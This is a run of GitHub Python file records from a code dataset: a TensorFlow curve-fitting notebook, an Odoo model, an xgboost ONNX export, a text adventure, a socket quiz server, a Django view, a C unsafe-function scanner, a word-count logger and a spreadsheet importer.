graph\nEPOCH = 10000\n\nm1_loss_list1 = []\nfor i in range(EPOCH):\n    # train and net output\n    _, l, pred = sess.run([m1_train_op, m1_loss, 
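# Aside on the "same amount of parameters" claim in this notebook: dense-layer
# parameter counts are n_in * n_out weights plus n_out biases, so both architectures
# can be checked by hand. The widths below mirror the layer definitions above,
# assuming every hidden layer feeds the next one.
def dense_params(widths):
    # weights plus biases for each consecutive pair of layer widths
    return sum(a * b + b for a, b in zip(widths, widths[1:]))

print(dense_params([1, 5, 10, 15, 10, 5, 1]))  # 456 for model 1
print(dense_params([1, 6, 18, 16, 1]))         # 459 for model 2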
m1_output], feed_dict={input_x: X_train, output_y: Y1_train})\n m1_loss_list1.append(l)\n if i%2000 == 0:\n print(\"Epoch: \",i,\"Loss: \",l)\nm1_pred1 = pred\n\n\n# ### 1.5 Training model on Function 2\n\n# In[215]:\n\n\nsess = tf.Session() \nsess.run(tf.global_variables_initializer()) # initialize var in graph\nEPOCH = 10000\nm1_loss_list2 = []\nfor i in range(EPOCH):\n # train and net output\n _, l, pred = sess.run([m1_train_op, m1_loss, m1_output], feed_dict={input_x: X_train, output_y: Y2_train})\n m1_loss_list2.append(l)\n if i%2000 == 0:\n print(\"Epoch: \",i,\"Loss: \",l)\nm1_pred2 = pred\n\n\n# ### 1.6 Result Visualization\n\n# In[216]:\n\n\n# Function 1\nfig,axs = plt.subplots(1,2)\nfig.set_figwidth(15)\naxs[0].plot(X,m1_pred1,X,Y1)\nfig.suptitle('Function 1')\naxs[0].legend(('Model 1','Ground Truth'))\naxs[0].set_xlabel('x')\naxs[0].set_ylabel('f(x)')\n\nepoch_list = np.arange(EPOCH)\naxs[1].plot(epoch_list,m1_loss_list1)\naxs[1].set_ylim([0,0.02])\naxs[1].set_xlabel('Epoch')\naxs[1].set_ylabel('Loss');\n\nplt.pause(0.1)\n\n# Function 2\nfig,axs = plt.subplots(1,2)\nfig.set_figwidth(15)\naxs[0].plot(X,m1_pred2,X,Y2)\nfig.suptitle('Function 2')\naxs[0].legend(('Model 1','Ground Truth'))\naxs[0].set_xlabel('x')\naxs[0].set_ylabel('f(x)')\n\naxs[1].plot(epoch_list,m1_loss_list2)\naxs[1].set_xlabel('Epoch')\naxs[1].set_ylabel('Loss');\n\n\n# ---\n# ## 2 - 2nd Model\n\n# ### 2.1 Network Architecture\n\n# In[217]:\n\n\ntf.reset_default_graph()\ninput_x = tf.placeholder(tf.float32,shape=[None,1])\noutput_y = tf.placeholder(tf.float32,shape=[None,1])\n# Model 2 neural network layers\nm2_h1 = tf.layers.dense(inputs=input_x, units=6, activation=tf.nn.relu, name='model2_h1') # hidden layer\nm2_h2 = tf.layers.dense(inputs=m2_h1, units=18, activation=tf.nn.relu, name='model2_h2') # hidden layer\nm2_h3 = tf.layers.dense(inputs=m2_h2, units=16, activation=tf.nn.relu, name='model2_h4') # hidden layer\nm2_output = tf.layers.dense(inputs=m2_h3, units=1, name='model2_output') # output layer\n\n\n# ### 2.2 Parameters Count\n\n# In[218]:\n\n\ntotal_parameters = 0\nfor variable in tf.trainable_variables():\n if(variable.name.find(\"model2\")>=0):\n print(variable)\n shape = variable.get_shape()\n variable_parameters = 1\n for dim in shape:\n variable_parameters *= dim.value\n print(\"parameter num:\",variable_parameters)\n total_parameters += variable_parameters\nprint(\"Total Parameter: \",total_parameters)\n\n\n# ### 2.3 Loss Function and Optimizer Initialization\n\n# In[219]:\n\n\nm2_loss = tf.losses.mean_squared_error(output_y, m2_output) # compute cost\nm2_optimizer = tf.train.AdamOptimizer(learning_rate=0.0001)\nm2_train_op = m2_optimizer.minimize(m2_loss)\n\n\n# ### 2.4 Training Model on Function 1\n\n# In[220]:\n\n\nsess = tf.Session() \nsess.run(tf.global_variables_initializer()) # initialize var in graph\nEPOCH = 10000\nm2_loss_list1 = []\nfor i in range(EPOCH):\n # train and net output\n _, l, pred = sess.run([m2_train_op, m2_loss, m2_output], feed_dict={input_x: X_train, output_y: Y1_train})\n m2_loss_list1.append(l)\n if i%2000 == 0:\n print(\"Epoch: \",i,\"Loss: \",l)\nm2_pred1 = pred\n\n\n# ### 2.5 Training Model on Function 2\n\n# In[221]:\n\n\nsess = tf.Session() \nsess.run(tf.global_variables_initializer()) # initialize var in graph\nEPOCH = 10000\nm2_loss_list2 = []\nfor i in range(EPOCH):\n # train and net output\n _, l, pred = sess.run([m2_train_op, m2_loss, m2_output], feed_dict={input_x: X_train, output_y: Y2_train})\n m2_loss_list2.append(l)\n if i%2000 == 0:\n print(\"Epoch: 
\",i,\"Loss: \",l)\nm2_pred2 = pred\n\n\n# ### 2.6 Result Visualization\n\n# In[222]:\n\n\n# Function 1\nfig,axs = plt.subplots(1,2)\nfig.set_figwidth(15)\naxs[0].plot(X,m2_pred1,X,Y1)\nfig.suptitle('Function 1')\naxs[0].legend(('Model 2','Ground Truth'))\naxs[0].set_xlabel('x')\naxs[0].set_ylabel('f(x)')\n\nepoch_list = np.arange(EPOCH)\naxs[1].plot(epoch_list,m2_loss_list1)\naxs[1].set_xlabel('Epoch')\naxs[1].set_ylabel('Loss');\n\nplt.pause(0.1)\n\nfig,axs = plt.subplots(1,2)\nfig.set_figwidth(15)\naxs[0].plot(X,m2_pred2,X,Y2)\nfig.suptitle('Function 2')\naxs[0].legend(('Model 2','Ground Truth'))\naxs[0].set_xlabel('x')\naxs[0].set_ylabel('f(x)')\naxs[1].plot(epoch_list,m2_loss_list2)\naxs[1].set_xlabel('Epoch')\naxs[1].set_ylabel('Loss');\n\n\n# ## Final Result Comparison\n\n# In[223]:\n\n\n# Function 1\nfig,axs = plt.subplots(1,2)\nfig.set_figwidth(15)\naxs[0].plot(X,m1_pred1,X,m2_pred1,X,Y1)\nfig.suptitle('Function 1')\naxs[0].legend(('Model 1','Model 2','Ground Truth'))\naxs[0].set_xlabel('x')\naxs[0].set_ylabel('f(x)')\n\nepoch_list = np.arange(EPOCH)\naxs[1].plot(epoch_list,m1_loss_list1,epoch_list,m2_loss_list1)\naxs[1].legend(('Model 1','Model 2'))\naxs[1].set_xlabel('Epoch')\naxs[1].set_ylabel('Loss');\nplt.pause(0.1)\n\n# Function 2\nfig,axs = plt.subplots(1,2)\nfig.set_figwidth(15)\naxs[0].plot(X,m1_pred2,X,m2_pred2,X,Y2)\nfig.suptitle('Function 2')\naxs[0].legend(('Model 1','Model 2','Ground Truth'))\naxs[0].set_xlabel('x')\naxs[0].set_ylabel('f(x)')\n\naxs[1].plot(epoch_list,m1_loss_list2,epoch_list,m2_loss_list2)\naxs[1].legend(('Model 1','Model 2'))\naxs[1].set_xlabel('Epoch')\naxs[1].set_ylabel('Loss');\n\n","repo_name":"zftan0709/DL_HW","sub_path":"HW1/CPSC8810_HW1-1 Simulated Function.py","file_name":"CPSC8810_HW1-1 Simulated Function.py","file_ext":"py","file_size_in_byte":8978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"74757226119","text":"from odoo import models, fields, api\n\n\nclass ProductionPreparationLineSample(models.Model):\n _name = \"production_preparation_line_sample\"\n _description = '产前准备明细样本'\n _order = 'sequence'\n\n\n group_type = fields.Selection([('1_3pgcxx', '3P过程信息'),\n ('2_swqr', '实物确认'),\n ('3_pxqzb', '培训前准备'),\n ('4_sbpx', '首包培训'),\n ('5_dhkkqzb', '大货开款前准备'),\n ('6_xczk', '现场转款'),\n ], string=\"组别\")\n before_go_online = fields.Selection([('1_four_day', '四天'),\n ('2_three_day', '三天'),\n ('3_two_day', '两天'),\n ('4_punish', '当天'),\n ], string=\"新款上线前\")\n content = fields.Char(string=\"内容\")\n department_ids = fields.Many2many(\"hr.department\", string=\"部门\")\n sequence = fields.Integer(string=\"序号\")","repo_name":"WangNengZhi/odoo_project","sub_path":"custom-addons/fsn_production_preparation/models/production_preparation_line_sample.py","file_name":"production_preparation_line_sample.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"3802443003","text":"import numpy as np\nfrom sklearn.datasets import load_boston\nfrom sklearn.model_selection import train_test_split\nimport xgboost as xgb\nimport onnxmltools\nfrom skl2onnx.common.data_types import FloatTensorType\n\nboston = load_boston()\n\nx, y = boston.data, boston.target\nxtrain, xtest, ytrain, ytest=train_test_split(x, y, test_size=0.30, random_state=99)\n\nmodel = xgb.XGBRegressor(objective='reg:squarederror',colsample_bytree = 0.3, learning_rate = 0.1, max_depth = 5,alpha = 10, n_estimators = 
10)\nprint(model)\n\nmodel.fit(xtrain, ytrain) \n\ntest_in = np.full((1, 13), 0.2)\nprint(model.predict(test_in))\n\nouttest = model.predict(xtest[0:100])\n\ninitial_types = [('float_input', FloatTensorType([None, xtrain.shape[1]]))]\nonnx_model = onnxmltools.convert_xgboost(model, initial_types=initial_types)\nonnxmltools.utils.save_model(onnx_model, './xgboost_boston.onnx')\n\nnp.savetxt(\"input_xgb.csv\", xtest[0:100], delimiter=\",\")\nnp.savetxt(\"output_xgb.csv\", outtest, delimiter=\",\")\n\n\n","repo_name":"MaB700/onnx_workflow_root","sub_path":"xgboost/xgb.py","file_name":"xgb.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"9934577763","text":"weapon = False\n\ndef strangeCreature():\n    actions = [\"fight\",\"flee\"]\n    global weapon\n    print(\"A strange ghoul-like creature has appeared. You can either run or fight it. What would you like to do?\")\n    userInput = \"\"\n    while userInput not in actions:\n        print(\"Options: flee/fight\")\n        userInput = input()\n        if userInput == \"fight\":\n            if weapon:\n                print(\"You kill the ghoul with the knife you found earlier. After moving forward, you find one of the exits. Congrats!\")\n            else:\n                print(\"The ghoul-like creature has killed you.\")\n            quit()\n        elif userInput == \"flee\":\n            showSkeletons()\n        else:\n            print(\"Please enter a valid option.\")\n    \ndef showSkeletons():\n    directions = [\"backward\",\"forward\"]\n    global weapon\n    print(\"You see a wall of skeletons as you walk into the room. Someone is watching you. Where would you like to go?\")\n    userInput = \"\"\n    while userInput not in directions:\n        print(\"Options: left/backward/forward\")\n        userInput = input()\n        if userInput == \"left\":\n            print(\"You find that this door opens into a wall. You open some of the drywall to discover a knife.\")\n            weapon = True\n        elif userInput == \"backward\":\n            introScene()\n        elif userInput == \"forward\":\n            strangeCreature()\n        else:\n            print(\"Please enter a valid option.\")\n    \n\ndef hauntedRoom():\n    directions = [\"right\",\"left\",\"backward\"]\n    print(\"You hear strange voices. You think you have awoken some of the dead. Where would you like to go?\")\n    userInput = \"\"\n    while userInput not in directions:\n        print(\"Options: right/left/backward\")\n        userInput = input()\n        if userInput == \"right\":\n            print(\"Multiple ghoul-like creatures start emerging as you enter the room. You are killed.\")\n            quit()\n        elif userInput == \"left\":\n            print(\"You made it! You've found an exit.\")\n            quit()\n        elif userInput == \"backward\":\n            introScene()\n        else:\n            print(\"Please enter a valid option.\")\n\ndef cameraScene():\n    directions = [\"forward\",\"backward\"]\n    print(\"You see a camera that has been dropped on the ground. Someone has been here recently. Where would you like to go?\")\n    userInput = \"\"\n    while userInput not in directions:\n        print(\"Options: forward/backward\")\n        userInput = input()\n        if userInput == \"forward\":\n            print(\"You made it! You've found an exit.\")\n            quit()\n        elif userInput == \"backward\":\n            showShadowFigure()\n        else:\n            print(\"Please enter a valid option.\")\n    \ndef showShadowFigure():\n    directions = [\"right\",\"backward\"]\n    print(\"You see a dark shadowy figure appear in the distance. You are creeped out. 
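# Aside on the xgboost-to-ONNX record above: the exported model can be
# sanity-checked with onnxruntime (assuming it is installed); the input name
# "float_input" matches the initial_types declared in the record.
import numpy as np
import onnxruntime as ort

sess = ort.InferenceSession("./xgboost_boston.onnx")
pred = sess.run(None, {"float_input": np.full((1, 13), 0.2, dtype=np.float32)})[0]
print(pred)  # should be close to model.predict(test_in) printed earlier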
Where would you like to go?\")\n    userInput = \"\"\n    while userInput not in directions:\n        print(\"Options: right/left/backward\")\n        userInput = input()\n        if userInput == \"right\":\n            cameraScene()\n        elif userInput == \"left\":\n            print(\"You find that this door opens into a wall.\")\n        elif userInput == \"backward\":\n            introScene()\n        else:\n            print(\"Please enter a valid option.\")\n\n\ndef introScene():\n    directions = [\"left\",\"right\",\"forward\"]\n    print(\"You are at a crossroads, and you can choose to go down any of the four hallways. Where would you like to go?\")\n    userInput = \"\"\n    while userInput not in directions:\n        print(\"Options: left/right/backward/forward\")\n        userInput = input()\n        if userInput == \"left\":\n            showShadowFigure()\n        elif userInput == \"right\":\n            showSkeletons()\n        elif userInput == \"forward\":\n            hauntedRoom()\n        elif userInput == \"backward\":\n            print(\"You find that this door opens into a wall.\")\n        else: \n            print(\"Please enter a valid option.\")\n\nif __name__ == \"__main__\":\n    while True:\n        print(\"Welcome to the Adventure Game!\")\n        print(\"As an avid traveller, you have decided to visit the Catacombs of Paris.\")\n        print(\"However, during your exploration, you find yourself lost.\")\n        print(\"You can choose to walk in multiple directions to find a way out.\")\n        print(\"Let's start with your name: \")\n        name = input()\n        print(\"Good luck, \" +name+ \".\")\n        introScene()","repo_name":"makeuseofcode/python-adventure-game","sub_path":"AdventureGame.py","file_name":"AdventureGame.py","file_ext":"py","file_size_in_byte":4047,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"63"} +{"seq_id":"70465096200","text":"subject_dict = {}\r\n\r\n\"\"\"\r\nthis function parses the database file into the global subject_dict\r\ninput: None\r\noutput: None (subject_dict maps each subject to its list of question dicts)\r\n\"\"\"\r\n\r\n\r\ndef parsing():\r\n    file_ob = open('DB.txt', 'r')\r\n    file_data = file_ob.read()\r\n    file_ob.close()\r\n    file_data = file_data.split('#')\r\n    file_data = file_data[1:]\r\n\r\n    for subject in file_data:\r\n        subject_list = []\r\n        first_star = subject.index('*')\r\n        subject_name = subject[:first_star]\r\n        subject_name = subject_name.replace('\\n', '')\r\n\r\n        questions = subject[first_star+1:]\r\n        questions = questions.split('*')\r\n\r\n        for question in questions:\r\n            question_dict = {}\r\n            question_params = question.split('::')\r\n            question_dict[\"sub_subject\"] = question_params[0]\r\n            question_dict[\"difficulty_level\"] = question_params[1]\r\n            question_dict[\"test_or_quiz\"] = question_params[2]\r\n            question_dict[\"year\"] = question_params[3]\r\n            question_dict[\"semester\"] = question_params[4]\r\n            question_dict[\"file_format\"] = question_params[5]\r\n            question_dict[\"is_solved\"] = question_params[6]\r\n            question_dict[\"file_path\"] = question_params[7]\r\n            question_dict[\"question_id\"] = question_params[8]\r\n            subject_list.append(question_dict)\r\n        subject_dict[subject_name] = subject_list\r\n\r\n\r\n\"\"\"\r\nthis function controls the network side of the server: it sets up the listening socket\r\nand waits for a connection from the user\r\ninput: None\r\noutput: the accepted client socket and the listening server socket\r\n\"\"\"\r\n\r\n\r\ndef connect():\r\n    import socket\r\n\r\n    serv_soc = socket.socket()\r\n    serv_soc.bind((\"0.0.0.0\", 8482))\r\n\r\n    serv_soc.listen(1)\r\n    client_soc, client_address = serv_soc.accept()\r\n\r\n    return client_soc, serv_soc\r\n\r\n\"\"\"\r\nsplits the data from the client into the command and the parameter\r\ninput: client 
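# Aside on parsing() above: the code implies a DB.txt layout in which '#' opens a
# subject, '*' opens a question, and '::' separates the nine question fields. A
# hypothetical record consistent with that code (all field values are invented):
sample_db = (
    "#Math"
    "*Algebra::3::test::2020::A::pdf::yes::questions/alg1.pdf::q001"
    "*Geometry::2::quiz::2019::B::docx::no::questions/geo7.docx::q002"
)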
data\r\noutput: the protocol command and the parameter from the user\r\n\"\"\"\r\n\r\n\r\ndef slicing(client_data):\r\n    client_data = client_data.decode()\r\n    # commands have different lengths (SSUB/SUBJ vs FID), so match known prefixes\r\n    for command in (\"SSUB\", \"SUBJ\", \"FID\"):\r\n        if client_data.startswith(command):\r\n            return command, client_data[len(command):]\r\n    return client_data, \"\"\r\n\r\n\"\"\"\r\nthe following functions search for the user request by the command and parameter\r\ninput: command and parameter\r\noutput: the response to send back to the client\r\n\r\n\"\"\"\r\n\r\n\r\ndef searching(command, pram):\r\n    if command == \"SSUB\":\r\n        return SSUB(pram)\r\n    elif command == \"SUBJ\":\r\n        return SUBJ(pram)\r\n    elif command == \"FID\":\r\n        return find_in_question(pram, \"difficulty_level\")\r\n\r\n\r\n\r\ndef SSUB(parm):\r\n    for subject in subject_dict.values():\r\n        for question in subject:\r\n            if parm.lower() in question[\"sub_subject\"].lower():\r\n                return question[\"file_path\"]\r\n    return None\r\n\r\n\r\ndef SUBJ(parm):\r\n    question_list = []\r\n    if parm.capitalize() in subject_dict.keys():\r\n        for question in subject_dict[parm.capitalize()]:\r\n            question_list.append(question[\"file_path\"])\r\n        return '\\n'.join(question_list)\r\n\r\n\r\ndef find_in_question(parm, command):\r\n    for subject in subject_dict.values():\r\n        for question in subject:\r\n            if parm.lower() in question[\"question_id\"].lower():\r\n                return question[command]\r\n    return None\r\n\r\n\r\n\r\ndef main():\r\n    parsing()\r\n    client_soc, serv_soc = connect()\r\n    while True:\r\n        client_data = client_soc.recv(1024)\r\n        if not(client_data): # closing the network connection if there is no data from the client\r\n            client_soc.close()\r\n            serv_soc.close()\r\n            break\r\n        command, pram = slicing(client_data)\r\n        answer = searching(command, pram)\r\n        if answer is None:\r\n            answer = \"\"\r\n        client_soc.send(answer.encode()) # send the suitable response back to the client\r\n\r\n\r\nmain()\r\n","repo_name":"ariel7590/PE_Fundementals_Project_1-1","sub_path":"Data Base/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"27471798889","text":"from django.shortcuts import render, render_to_response\nfrom django.views.generic import View\nfrom sozluk.models import Entry, Post\n\n\ndef post_list(request):\n\n    template_path = 'sozluk/entry_list.html'\n    context = {}\n    all_entry = Entry.objects.all()\n    entry_list = []\n    if all_entry:\n        for entry in all_entry:\n            entry_list.append(entry)\n    context['entry_list'] = entry_list\n    return render(request, template_path, context)\n","repo_name":"YaseminGrcn/sozluk","sub_path":"sozluk/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"71266557962","text":"#!/usr/bin/env python3\n\n# @author: Ian Guibas\n# This library does a simple quick scan of C source code\n# and looks for potentially dangerous snippets. Due to certain\n# aspects of computing, there is non-deterministic behaviour in\n# identifying particular program features. I have opted to simply\n# ensure some simple mistakes are avoided here.\n\nimport re\nimport os\nimport sys\n\n# Used for short circuit logic\nclass ShortCircuit(Exception):\n    pass\n\nINSECURE = {'gets':0,\n            'scanf':1,\n            'sprintf':2,\n            'strcpy':3,\n            'strcat':4,\n            'tmpfile':5,\n            'mktemp':5\n            }\n\nALTERNATIVES = {0:'fgets using standard input as the file stream',\n                1:'fgets for input then sscanf for parsing',\n                2:'snprintf',\n                3:'strncpy or strndup',\n                4:'strncat',\n                5:'mkstemp',\n                }\n\nREASONS = { 0:'gets is deprecated and completely unbounded. 
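# Aside on the quiz-server protocol above: a minimal client sketch (host and port
# follow connect()); a request is the command immediately followed by its parameter.
import socket

with socket.socket() as s:
    s.connect(("127.0.0.1", 8482))
    s.send("SUBJMath".encode())  # 'SUBJ' command with subject parameter 'Math'
    print(s.recv(1024).decode())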
It will ALWAYS' +\n 'lead to a buffer overflow and instability.',\n 1:'scanf does no bounds checking and can lead to a buffer ' +\n 'overflow.',\n 2:'sprintf does no bounds checking on the destination buffer ' +\n 'which can lead to buffer overflows and instability.',\n 3:'strcpy does not check that the source string fits into the ' +\n 'destination buffer which can lead to buffer overflows. ' +\n 'As an aside, strncpy may not provide the most efficient ' +\n 'behavior, depending upon the size of the source and ' +\n 'destination buffers.',\n 4:'strcat does not check that the total length does not exceed ' +\n 'the buffer size of the destination leading to buffer overflows.',\n 5:'tmpfile and mktemp often do not set the correct permissions ' +\n 'on the temporary files they create leading to potential ' +\n 'information leaks and/or undefined behaviour based upon ' +\n 'how the files get used.'}\n\n \ndef color(text, color, BOLD=False):\n \"\"\"ANSI Sequence wrapper for text, colorizes output\"\"\"\n ANSI_PREFIX = '\\x1b['\n ANSI_ENDS = '\\x1b[0m'\n ANSI_COLORS_FOREGROUND = {\n 'black' : ANSI_PREFIX + '90m',\n 'red' : ANSI_PREFIX + '91m',\n 'green' : ANSI_PREFIX + '92m',\n 'yellow' : ANSI_PREFIX + '93m',\n 'blue' : ANSI_PREFIX + '94m',\n 'magenta' : ANSI_PREFIX + '95m',\n 'cyan' : ANSI_PREFIX + '96m',\n 'white' : ANSI_PREFIX + '97m'\n }\n\n if color.lower() in ANSI_COLORS_FOREGROUND.keys():\n colored = ANSI_COLORS_FOREGROUND[color] + text + ANSI_ENDS\n if BOLD:\n colored = '\\x1b[1m' + colored\n return colored\n \n else: return text\n\nclass scanner:\n \"\"\"Scan source code for bad calls.\n Requires path to source file to scan\"\"\" \n\n def __init__(self, src):\n with open(src,'r') as f:\n self.source = f.readlines()\n \n def scan(self):\n \n # REGULAR EXPRESSIONS\n r_gets = re.compile(r'\\s*gets\\(.*\\);')\n r_scanf = re.compile(r'\\s*scanf\\(.*\\);')\n r_sprintf = re.compile(r'\\s*sprintf\\(.*\\);')\n r_strcpy = re.compile(r'\\s*strcpy\\(.*\\);')\n r_strcat = re.compile(r'\\s*strcat\\(.*\\);')\n r_tmpfile = re.compile(r'\\s*tmpfile\\(.*\\);')\n r_mktemp = re.compile(r'\\s*mktemp\\(.*\\);')\n r_badprintf = re.compile(r'\\s*printf\\([a-zA-Z].*')\n \n print('Scanning...')\n print()\n\n DANGER = '\\x1b[41m\\x1b[1mDANGER\\x1b[0m '\n WARN = '\\x1b[45m\\x1b[1mwarning\\x1b[0m '\n\n lineno = 0\n for line in self.source:\n lineno += 1\n try:\n if r_gets.match(line):\n code = INSECURE['gets']\n alternative = ALTERNATIVES[code]\n reason = REASONS[code]\n print(DANGER, end='')\n print(color('Line {}: '.format(lineno),'red',True),end=' ')\n print('Found ' + color('gets()','red'))\n print('Possible replacement: {0}'.format(alternative))\n print('Reason: {0}'.format(reason))\n raise ShortCircuit\n\n if r_scanf.match(line): \n code = INSECURE['scanf']\n alternative = ALTERNATIVES[code]\n reason = REASONS[code]\n print(WARN, end='')\n print(color('Line {}: '.format(lineno),'red',True),end=' ')\n print('Found ' + color('scanf()','green'))\n print('Possible replacement: {0}'.format(alternative))\n print('Reason: {0}'.format(reason))\n raise ShortCircuit\n\n if r_sprintf.match(line): \n code = INSECURE['sprintf']\n alternative = ALTERNATIVES[code]\n reason = REASONS[code]\n print(WARN, end='')\n print(color('Line {}: '.format(lineno),'red',True),end=' ')\n print('Found ' + color('sprintf()', 'green'))\n print('Possible replacement: {0}'.format(alternative))\n print('Reason: {0}'.format(reason))\n raise ShortCircuit\n\n if r_strcpy.match(line):\n code = INSECURE['strcpy']\n alternative = 
ALTERNATIVES[code]\n reason = REASONS[code]\n print(WARN, end='')\n print(color('Line {}: '.format(lineno),'red',True),end=' ')\n print('Found ' + color('strcpy()','green'))\n print('Possible replacement: {0}'.format(alternative))\n print('Reason: {0}'.format(reason))\n raise ShortCircuit\n \n if r_strcat.match(line):\n code = INSECURE['strcat']\n alternative = ALTERNATIVES[code]\n reason = REASONS[code]\n print(WARN, end='')\n print(color('Line {}: '.format(lineno),'red',True),end=' ')\n print('Found ' + color('strcat()','green'))\n print('Possible replacement: {0}'.format(alternative))\n print('Reason: {0}'.format(reason))\n raise ShortCircuit\n\n if r_tmpfile.match(line):\n code = INSECURE['tmpfile']\n alternative = ALTERNATIVES[code]\n reason = REASONS[code]\n print(WARN, end='')\n print(color('Line {}: '.format(lineno),'red',True),end=' ')\n print('Found ' + color('tmpfile()','green'))\n print('Possible replacement: {0}'.format(alternative))\n print('Reason: {0}'.format(reason))\n raise ShortCircuit\n\n if r_mktemp.match(line):\n code = INSECURE['mktemp']\n alternative = ALTERNATIVES[code]\n reason = REASONS[code]\n print(WARN, end='')\n print(color('Line {}: '.format(lineno),'red',True),end=' ')\n print('Found ' + color('mktemp()','green'))\n print('Possible replacement: {0}'.format(alternative))\n print('Reason: {0}'.format(reason))\n raise ShortCircuit\n\n if r_badprintf.match(line):\n print(DANGER, end='')\n print(color('Line {}: '.format(lineno),'red',True),end=' ')\n print('Found ' + color('printf(var)','red',True))\n print('Possible replacement: puts(var)')\n print('Reason: User input should never be passed directly '+\n 'to a format string function as printf makes ' +\n 'no distinction between a user string and format ' +\n 'string. This allows a user to specify formats to ' +\n 'both leak and modify the program memory as well ' +\n 'as hijack control flow and undermine various ' +\n 'security methods such as ASLR and Canary.')\n # No need to short circuit at end\n\n # No need to evaluate line for all RE's, stop on first match\n except ShortCircuit:\n print()\n pass\n\n def view_source(self):\n '''Attempts to view the source code in a human readable manner'''\n\n lineno = 1\n for line in self.source:\n line = line.replace('\\n','')\n print(str(lineno) + '\\t' + line)\n lineno += 1\n\n","repo_name":"ArthasLi/py_itu_mdb_1","sub_path":"test/venv/Lib/site-packages/fcfuzz/SS/sourcescan.py","file_name":"sourcescan.py","file_ext":"py","file_size_in_byte":8835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"18673107392","text":"#! 
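# Aside on scanner.scan() above: the per-function branches are identical in shape,
# so a table-driven variant is sketched here. INSECURE and ALTERNATIVES are the
# module's own dicts; everything else is illustrative.
import re

PATTERNS = {fn: re.compile(r"\s*%s\(.*\);" % fn)
            for fn in ("gets", "scanf", "sprintf", "strcpy", "strcat", "tmpfile", "mktemp")}

def scan_line(line, lineno):
    # one finding per line, mirroring the repeated if-blocks in scan()
    for fn, pattern in PATTERNS.items():
        if pattern.match(line):
            code = INSECURE[fn]
            return "Line %d: found %s(), consider %s" % (lineno, fn, ALTERNATIVES[code])
    return None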
/usr/bin/python\nimport sqlite3\nimport sys\nimport os\nfrom datetime import datetime, timedelta\n\ndate = datetime.today()\nif sys.argv[1] == '-y':\n    date = date - timedelta(days=1)\n    del sys.argv[1]\ntimestamp = int(date.timestamp())\n\ntry:\n    words = int(sys.argv[1])\nexcept:\n    print(\"First argument must be a number\")\n    sys.exit(1)\n\ndesc = None\nif len(sys.argv) > 2:\n    desc = sys.argv[2]\ndbpath = os.environ.get(\"WORDCOUNT_DB\", \"wordcount.db\")\ndb = sqlite3.connect(dbpath)\ncur = db.cursor()\ncur.execute(\"CREATE TABLE IF NOT EXISTS wordcount(date INT NOT NULL, words INT NOT NULL, desc STRING)\")\ncur.execute(\"INSERT INTO wordcount VALUES(?, ?, ?)\", (timestamp, words, desc))\ndb.commit()\ndb.close()\n\n","repo_name":"carewdavid/wordtracker","sub_path":"words.py","file_name":"words.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"16816568927","text":"# -*- coding:utf -*-\n\nimport pandas as pd\n# import xlrd\nfrom db.action import PdDataAction, UploadFileAction\nfrom db.orm import PdData\n\n\n# Parse the Excel / csv / tsv file with the given file name and store it in the database\n\n\ndef storage_data(file_name):\n    corpus_file_path = \"../static/corpus/\" + file_name\n\n    if file_name[-4:] == \".xls\":  # .xls file\n        # data = xlrd.open_workbook(corpus_file_path)\n        # excelTable = data.sheets()[0]\n        # # get whole rows/columns, row count, column count, and cell values\n        # print(excelTable.row_values(0))  # get the first row as a list\n        # print(excelTable.col_values(0))  # get the first column as a list\n        # print(excelTable.nrows)  # get the number of rows\n        # print(excelTable.ncols)  # get the number of columns\n        # print(excelTable.cell(0, 0))  # get the value of the cell in the first row, first column\n        data = pd.read_excel(corpus_file_path, header=None)\n    elif file_name[-4:] == \".csv\":  # .csv file\n        data = pd.read_csv(corpus_file_path, header=None)\n    else:  # .tsv file\n        data = pd.read_csv(corpus_file_path, sep='\\t', header=None)\n    print(data)\n    print(data.shape)  # (401, 1)\n    pdDatas = []\n    row_num = data.shape[0]\n    col_num = data.shape[1]\n    pdDataAction = PdDataAction()\n    uploadFileAction = UploadFileAction()\n\n    for row_index in range(0, row_num):\n        for col_index in range(0, col_num):\n\n            print(data.iloc[row_index, col_index])\n\n            uploadFile = uploadFileAction.GetUploadFileRecordByFileNameTid(file_name_tid=file_name)\n\n            pdData = PdData(\n                file_name_id=uploadFile.id,\n                sheet_index=0,\n                row_index=row_index + 1,\n                col_index=col_index + 1,\n                unit_value=data.iloc[row_index, col_index],\n                invalid=False,\n            )\n            pdDatas.append(pdData)\n\n    pdDataAction.InsertManyPdData(pdDatas)\n\n\nif __name__ == \"__main__\":\n    test_file_name = \"2020052211511528963382193.csv\"\n    storage_data(file_name=test_file_name)\n\n\n\n\n","repo_name":"CodeAsPoetry/NLP_Platform","sub_path":"scrapy_data/upload_excel.py","file_name":"upload_excel.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"39147318865","text":"import dataclasses\nimport collections\nimport logging\nimport os\nimport sys\nfrom dataclasses import dataclass, field\nfrom typing import Dict, List, Optional, Tuple\nimport uuid\nimport json\n\ntry:\n    import ConfigParser as configparser\nexcept:\n    import configparser\n\n\n@dataclass\nclass ModelArguments:\n    \"\"\"\n    Arguments pertaining to which model/config/tokenizer we are going to fine-tune from.\n    \"\"\"\n\n    model_name_or_path: str = field(\n        metadata={\n            \"help\": \"Path to pretrained model or model identifier from huggingface.co/models\"\n        }\n    )\n    config_name: Optional[str] = field(\n        default=None,\n        
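# Aside on storage_data() above: the three suffix branches can be collapsed into a
# dispatch table keyed on the last four characters of the file name (a sketch using
# the same pandas readers as the record).
import pandas as pd

READERS = {
    ".xls": lambda p: pd.read_excel(p, header=None),
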